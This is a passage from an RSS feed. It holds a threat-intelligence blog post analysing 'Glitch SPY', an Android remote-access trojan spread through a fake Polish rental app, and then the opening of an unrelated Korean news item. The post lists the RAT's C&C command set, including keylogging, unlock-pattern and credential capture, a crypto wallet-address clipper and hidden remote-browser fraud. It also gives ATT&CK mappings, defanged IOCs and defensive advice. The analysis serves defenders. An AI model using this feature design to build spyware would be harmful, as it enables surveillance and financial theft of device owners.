<tr>
<td>send_sms</td>
<td>Sends an SMS message from the infected device using TA provided content.</td>
</tr>
<tr>
<td>request_contacts</td>
<td>Extracts the victim’s contact list.</td>
</tr>
<tr>
<td>request_call_log</td>
<td>Collects call history from the infected device.</td>
</tr>
<tr>
<td>request_location</td>
<td>Retrieves the device location.</td>
</tr>
<tr>
<td>request_app_list</td>
<td>Enumerates installed applications on the device.</td>
</tr>
<tr>
<td>request_device_accounts</td>
<td>Collects account information configured on the Android device.</td>
</tr>
<tr>
<td>request_system_info</td>
<td>Collects device metadata</td>
</tr>
<tr>
<td>request_file_list</td>
<td>Lists files and folders from a specified path on the device.</td>
</tr>
<tr>
<td>request_file_download</td>
<td>Downloads a selected file from the infected device to the C&amp;C.</td>
</tr>
<tr>
<td>request_folder_zip_download</td>
<td>Compresses a folder and prepares it for download</td>
</tr>
<tr>
<td>file_upload_start</td>
<td>Starts a file upload session.</td>
</tr>
<tr>
<td>file_upload_chunk</td>
<td>Transfers a chunk of a file being uploaded to the infected device.</td>
</tr>
<tr>
<td>file_upload_finish</td>
<td>Finalizes the file upload operation on the device.</td>
</tr>
<tr>
<td>file_upload_cancel</td>
<td>Cancels an active file upload session.</td>
</tr>
<tr>
<td>file_mkdir</td>
<td>Creates a new directory on the infected device.</td>
</tr>
<tr>
<td>file_rename</td>
<td>Renames a selected file or folder on the device.</td>
</tr>
<tr>
<td>file_run</td>
<td>Opens or executes a selected file on the infected device.</td>
</tr>
<tr>
<td>file_zip_here</td>
<td>Creates a ZIP archive next to the selected folder on the device.</td>
</tr>
<tr>
<td>file_crypto_lock</td>
<td>Encrypts a selected file, likely producing a .enc file and removing the original.</td>
</tr>
<tr>
<td>file_crypto_unlock</td>
<td>Decrypts a previously encrypted .enc file.</td>
</tr>
<tr>
<td>request_offline_keylog</td>
<td>Retrieves offline keylog data from the device.</td>
</tr>
<tr>
<td>start_keylogger</td>
<td>Starts keylogging</td>
</tr>
<tr>
<td>stop_keylogger</td>
<td>Stops the active keylogging module.</td>
</tr>
<tr>
<td>request_camera_stream</td>
<td>Starts camera streaming from the infected device.</td>
</tr>
<tr>
<td>stop_camera_stream</td>
<td>Stops the active camera stream.</td>
</tr>
<tr>
<td>start_audio</td>
<td>Starts audio capture from the infected device.</td>
</tr>
<tr>
<td>stop_audio</td>
<td>Stops audio capture.</td>
</tr>
<tr>
<td>start_clipboard_monitor</td>
<td>Starts monitoring the device clipboard.</td>
</tr>
<tr>
<td>stop_clipboard_monitor</td>
<td>Stops clipboard monitoring.</td>
</tr>
<tr>
<td>clipper_get_config</td>
<td>Retrieves the current crypto-clipper configuration from the device.</td>
</tr>
<tr>
<td>clipper_set_config</td>
<td>Pushes or updates clipper rules, likely including wallet replacement addresses.</td>
</tr>
<tr>
<td>clipper_inject_clipboard</td>
<td>Forces/injects clipboard content on the victim device.</td>
</tr>
<tr>
<td>execute_command</td>
<td>Executes a TA-provided shell command on the infected device.</td>
</tr>
<tr>
<td>remote_browser_start</td>
<td>Starts a remote browser session on the infected device.</td>
</tr>
<tr>
<td>remote_browser_stop</td>
<td>Stops the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_navigate</td>
<td>Navigates the remote browser to a supplied URL.</td>
</tr>
<tr>
<td>remote_browser_click</td>
<td>Performs a click action inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_text</td>
<td>Enter the TA-provided text into the remote browser.</td>
</tr>
<tr>
<td>remote_browser_swipe</td>
<td>Performs a swipe gesture inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_key</td>
<td>Sends keyboard key actions to the remote browser, such as Enter, Backspace, Tab, or arrow keys.</td>
</tr>
<tr>
<td>remote_browser_js_fill</td>
<td>Fills fields in the remote browser using JavaScript-style automation.</td>
</tr>
<tr>
<td>remote_browser_clear_field</td>
<td>Clears a selected input field in the remote browser.</td>
</tr>
<tr>
<td>remote_browser_action</td>
<td>Performs a generic browser-side action, likely used for submit, back, reload, or similar UI actions.</td>
</tr>
<tr>
<td>remote_browser_set_mode</td>
<td>Switches the remote browser view mode, such as desktop/mobile mode.</td>
</tr>
<tr>
<td>remote_browser_fps</td>
<td>Adjusts the remote browser streaming or update frame rate.</td>
</tr>
<tr>
<td>tap_ui_submit</td>
<td>Attempts to tap a visible submit/OK/Done button or sends Enter to submit the current UI.</td>
</tr>
<tr>
<td>pattern_fetch</td>
<td>Retrieves a stored Android unlock pattern from the malware/device-side store.</td>
</tr>
<tr>
<td>pattern_store</td>
<td>Saves a TA-provided Android unlock pattern for later reuse.</td>
</tr>
<tr>
<td>pattern_clear_store</td>
<td>Clears the saved unlock pattern from storage.</td>
</tr>
<tr>
<td>pattern_auto_unlock</td>
<td>Uses a saved or provided pattern to attempt automatic device unlock.</td>
</tr>
<tr>
<td>credential_fetch</td>
<td>Retrieves a stored PIN/password credential value or credential state.</td>
</tr>
<tr>
<td>credential_manual_save</td>
<td>Saves a PIN/password credential provided by the TA on the device side.</td>
</tr>
<tr>
<td>credential_manual_save_unlock</td>
<td>Saves a supplied credential and immediately attempts to unlock the device with it.</td>
</tr>
<tr>
<td>credential_auto_unlock</td>
<td>Attempts to unlock the device automatically using a previously captured or saved credential.</td>
</tr>
<tr>
<td>credential_clear</td>
<td>Clears the stored PIN/password credentials from the malware’s storage.</td>
</tr>
<tr>
<td>prompt_permission_notifications</td>
<td>Opens or triggers the Android notification permission flow.</td>
</tr>
<tr>
<td>prompt_permission_storage</td>
<td>Opens or triggers the storage permission flow.</td>
</tr>
<tr>
<td>prompt_permission_location</td>
<td>Opens or triggers the location permission flow.</td>
</tr>
<tr>
<td>prompt_permission_battery</td>
<td>Opens the battery optimization exemption flow.</td>
</tr>
<tr>
<td>prompt_permission_all_files</td>
<td>Opens the “All files access” permission screen.</td>
</tr>
<tr>
<td>activate_device_admin</td>
<td>Launches or triggers Device Admin activation for the malware.</td>
</tr>
<tr>
<td>deactivate_device_admin</td>
<td>Attempts to remove Device Admin rights from the malware.</td>
</tr>
<tr>
<td>block_biometric</td>
<td>Enables/disables biometric prompt suppression to force PIN/password fallback.</td>
</tr>
<tr>
<td>wake_screen</td>
<td>Wake the victim's device screen.</td>
</tr>
<tr>
<td>lock_device</td>
<td>Locks the device screen</td>
</tr>
<tr>
<td>hide_screen</td>
<td>Hides the visible device screen from the victim's side</td>
</tr>
<tr>
<td>hide_app</td>
<td>Hides the malware application icon or disables its launcher component.</td>
</tr>
<tr>
<td>show_app</td>
<td>Restores the malware application launcher component.</td>
</tr>
<tr>
<td>self_uninstall</td>
<td>Attempts to uninstall the malware from the device.</td>
</tr>
<tr>
<td>uninstall_app</td>
<td>Attempts to uninstall a specified application from the device.</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Capture and Live Streaming</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY can remotely view the victim’s screen and interact with the device in near real time.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the request_screen_stream command from the C&amp;C panel, the malware initiates its screen capture module and begins sending screen frames back to the server as screen_frame messages.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA’s panel includes options to control stream quality, FPS, and scale, indicating that the stream can be adjusted based on device state and network conditions.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121445,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-6-%E2%80%93-Screen-capture-Activity.png" alt="" class="wp-image-121445"><figcaption class="wp-element-caption"><em>Figure 6 – Screen capture Activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For a one-time capture, the TA can use request_screenshot, which instructs the malware to capture the device's screen and return the image to the C&amp;C. When visual streaming is unavailable or insufficient, the user can use request_screen_reader_text, which abuses the Android Accessibility Service to extract visible text from the active screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows the malware to collect sensitive information displayed in banking applications, <a href="https://cyble.com/knowledge-hub/top-secure-messaging-apps-encrypted-chats/">messaging apps</a>, OTP prompts, browser pages, and authentication screens.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In addition to visual monitoring, this capability supports hands-on fraud activity. By combining live screen streaming with Accessibility-based remote input, the TA can observe the victim’s device, understand the active application context, and perform follow-up actions such as tapping buttons, entering text, navigating screens, or capturing credentials.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>File Manager and File Encryption</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY includes a remote file manager that allows the TA to browse, retrieve, modify, and manipulate files on the infected device. When the TA sends request_file_list, the malware lists files and folders from the requested directory and returns the results to the C&amp;C as a file listing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the TA selects a file for exfiltration, the malware reads it and sends it back to the server. For folders, the malware compresses the selected directory before exfiltration, making it easier for the TA to retrieve multiple files.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY also includes file encryption and decryption functionality through the file_crypto_lock and file_crypto_unlock commands. When file_crypto_lock is issued, the malware encrypts the selected file using AES/GCM/NoPadding, creates an encrypted .enc version, and removes the original plaintext file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The encrypted file uses the FMENC1 header followed by cryptographic metadata and ciphertext. If standard deletion of the plaintext file fails, the malware uses a secure-delete routine that overwrites the file with random data, truncates it, syncs the file descriptor, and then attempts to delete it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121447,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-7-%E2%80%93-File-encryption-logic.png" alt="" class="wp-image-121447"><figcaption class="wp-element-caption"><em>Figure 7 – File encryption logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although file encryption could be abused for extortion, the analyzed sample does not confirm an automated mass-encryption routine, ransom note, payment workflow, or victim-facing ransom screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Crypto Clipper Functionality</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The crypto-clipper module is designed to monitor clipboard activity on the infected device and replace copied <a href="https://cyble.com/blog/cryptocurrency-firms-being-raided-by-cybercriminals/">cryptocurrency</a> wallet addresses with TA-configured addresses.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The module supports multiple wallet formats, including ETH/EVM addresses beginning with 0x, TRON/TRX addresses beginning with T, Bitcoin legacy addresses beginning with 1 or 3, and Bitcoin Bech32 addresses beginning with bc1q or bc1p. The code also includes URI-style prefixes such as bitcoin:, ethereum:, erc20:, tron:, bsc:, matic:, polygon:, arbitrum:, optimism:, base:, and ton:, indicating that the malware can detect wallet addresses copied in both plain-text and URI-prefixed formats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121453,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-8-%E2%80%93-Malware-implemented-crypto-wallet-address-pattern-match.png" alt="Figure 8 – Malware implemented crypto wallet address pattern match" class="wp-image-121453"><figcaption class="wp-element-caption"><em>Figure 8 – Malware implemented crypto wallet address pattern match</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the start_clipboard_monitor command, Glitch SPY begins tracking clipboard changes on the infected device. Before performing any replacement, the clipper module is enabled in the configuration.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If replacement is active, the malware reads the current clipboard content, extracts text from available clipboard items, removes null bytes and hidden formatting characters, normalizes whitespace, and attempts to identify a supported cryptocurrency wallet address.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If a valid wallet address is detected, Glitch SPY selects a configured replacement address from the same cryptocurrency family and ensures it is different from the victim-copied address. It then updates the clipboard using Android’s ClipboardManager.setPrimaryClip() API, replacing the victim’s original wallet address with the attacker-controlled value.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After the replacement, the malware reports the event to the C&amp;C server, including the original address, replacement address, and detected cryptocurrency type, such as ETH/EVM, TRX, or BTC.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121454,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-9-Crypto-clipper-clipboard-replacement-logic.png" alt="" class="wp-image-121454"><figcaption class="wp-element-caption"><em>Figure 9 - Crypto clipper clipboard replacement logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Browser Capability</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY’s remote browser capability allows the TA to open and control a browser session directly on the infected device. The malware receives a URL from the C&amp;C server and loads it inside a WebView on the victim’s device. It also supports switching between mobile and desktop browsing modes, allowing the TA to control how websites render during the session.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The browser session runs in a hidden off-screen window, keeping it active without alerting the victim. After the browser session is initialized, the malware reports the session status, loaded URL, browsing mode, and window details back to the C&amp;C server. This allows the TA to confirm that the browser session is active and ready for interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121455,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-10-Remote-browser-activity.png" alt="" class="wp-image-121455"><figcaption class="wp-element-caption"><em>Figure 10 - Remote browser activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA can further control the session using commands to navigate to URLs, click page elements, enter text, swipe through pages, send keyboard actions, and fill or clear web form fields.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When combined with screen streaming, keylogging, screen-reader extraction, clipboard monitoring, and Accessibility-based input, the remote browser capability provides a complete workflow for web-based account takeover and transaction manipulation from the infected device itself.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121457,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-11-%E2%80%93-Commands-to-control-WebView-sessions.png" alt="" class="wp-image-121457"><figcaption class="wp-element-caption"><em>Figure 11 – Commands to control WebView sessions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The feature can let attacker-controlled web activity originate from the victim’s own device rather than from external attacker infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This means the attacker's web activity originates from the victim's IP, with the victim's cookies and any active authenticated sessions intact — making it harder for banks or crypto platforms to flag the login as suspicious.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In fraud scenarios, this may allow attackers to interact with login pages, financial portals, cryptocurrency services, email accounts, or other web applications from the victim’s environment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY is a capable, actively developing Android threat combining surveillance, remote control, financial fraud, and account takeover within a single platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Its use of the established Brokewell loader for delivery, its abuse of the Accessibility Service to automate permission grants after a single user action, and its Builder, Dropper, and payload-management modules indicate a TA investing in a reusable framework rather than a one-off campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder's per-payload configuration options (custom name, icon, package ID, and decoy WebView URL) mean retargeting for a new region or lure requires no code changes.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While the current activity appears targeted at users searching for rental properties in Poland, one recovered APK and two identified C&amp;C panel URLs suggest early-stage distribution. The "Coming soon" Cryptor module and active panel development indicate the platform is still expanding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Users should avoid installing APKs from outside official app stores. The loader's first action is requesting permission to install from unknown sources; denying it stops the payload before it installs.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Any app that requests Accessibility Service or installs from unknown sources should be treated as suspicious. Keep Google Play Protect enabled.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Tactic</strong></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Initial Access (<a href="https://attack.mitre.org/tactics/TA0027">TA0027</a>)</td>
<td>Phishing (<a href="https://attack.mitre.org/techniques/T1660/">T1660</a>)</td>
<td>Glitch SPY is distributed via phishing sites</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers (T1624.001)</td>
<td>Glitch SPY implemented a broadcast receiver for screen capturing</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Impair Defenses: Prevent Application Removal (T1629.001)</td>
<td>Prevent uninstalling application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Hide Artifacts: Suppress Application Icon (<a href="https://attack.mitre.org/techniques/T1628/001/">T1628.001</a>)</td>
<td>Glitch SPY hides its icon</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Masquerading: Match Legitimate Name or Location (<a href="https://attack.mitre.org/techniques/T1655/001/">T1655.001</a>)</td>
<td>Glitch SPY masquerades as a Polish rental application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Input Injection (T1516)</td>
<td>Glitch SPY can perform actions such as Clicks, swipes, gestures, and enter text into edit fields.</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Abuse Accessibility Features (<a href="https://attack.mitre.org/techniques/T1453/">T1453</a>)</td>
<td>Glitch SPY abuses Accessibility service</td>
</tr>
<tr>
<td><strong> </strong></td>
<td>Input Capture: Keylogging (<a href="https://attack.mitre.org/techniques/T1417/001/">T1417.001</a>)</td>
<td>Glitch SPY includes a Keylogging module  </td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery  (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>Glitch SPY collects installed applications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>Glitch SPY can enumerate files from external storage</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>Glitch SPY can collect device location</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>Glitch SPY can collect device information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Archive Collected Data (<a href="https://attack.mitre.org/techniques/T1532/">T1532</a>)  </td>
<td>Glitch SPY compresses the external storage directories as a zip file before sending</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Screen Capture (<a href="https://attack.mitre.org/techniques/T1513/">T1513</a>)</td>
<td>Glitch SPY captures screen content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>Glitch SPY can capture Audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Clipboard Data (T1414)</td>
<td>Malware can monitor Clipboard content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>Malware collects encrypted files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Malware collects contact details</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Glitch SPY collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>Malware collects Account information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>Glitch SPY collects Call logs</td>
</tr>
<tr>
<td>Command &amp; Control (<a href="https://attack.mitre.org/tactics/TA0037">TA0037</a>)</td>
<td>Application Layer Protocol (<a href="https://attack.mitre.org/techniques/T1437/">T1437</a>)</td>
<td>Glitch SPY communicates with C2 over TCP</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>Glitch SPY exfiltrates data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Encrypted for Impact (<a href="https://attack.mitre.org/techniques/T1471/">T1471</a>)</td>
<td>Malware encrypts all the files present on the device with the .enc extension</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Glitch SPY deletes all plain-text files after encryption</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Indicators</strong></td>
<td><strong>Indicator type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>hxxps://tutaj-dompl[.]com/Tutajdom.apk</td>
<td>URL</td>
<td>Distribution URL</td>
</tr>
<tr>
<td>sportypointsrewards[.]com</td>
<td>Domain</td>
<td>C&amp;C server</td>
</tr>
<tr>
<td>80af5e921cf8a3052fe4483bb2eb15953590e72ed003ac61c0b9135575c32075</td>
<td>FileHash-SHA256</td>
<td>Glitch SPY Hash</td>
</tr>
<tr>
<td>d439475bf09af7b474cdba2c19e136a1dd38e62b088537445ac3c8e4c2d3a8b1</td>
<td>FileHash-SHA256</td>
<td>Brokewell Loader</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/">Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[클로드 코드 총괄 “프로토타이퍼·빌더·그로워…AI 시대 조직은 이렇게 바뀐다”]]></title>
<description><![CDATA[앤트로픽에서 AI 코딩 도구 클로드 코드 개발을 주도하고 관련 팀을 총괄하는 보리스 체르니(Boris Cherny)는 28일 X를 통해 내부 제품 조직을 관찰한 결과를 바탕으로 미래 제품 조직의 다섯 가지 핵심 역할을 제시했다.



첫 번째는 ‘프로토타이퍼(Prototyper)’다. 새로운 아이디어를 끊임없이 발굴하고 빠르게 실험하는 역할이다. 수많은 아이디어를 만들어내지만 실제 제품으로 이어지는 것은 일부에 그친다.



두 번째는 ‘빌더(Builder)’다. 프로토타입이나 아이디어를 빠르게 실제 서비스 수준의 제품과 인프...]]></description>
<link>https://tsecurity.de/de/3632553/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632553/it-nachrichten/ai/</guid>
<pubDate>Mon, 29 Jun 2026 12:03:08 +0200</pubDate>
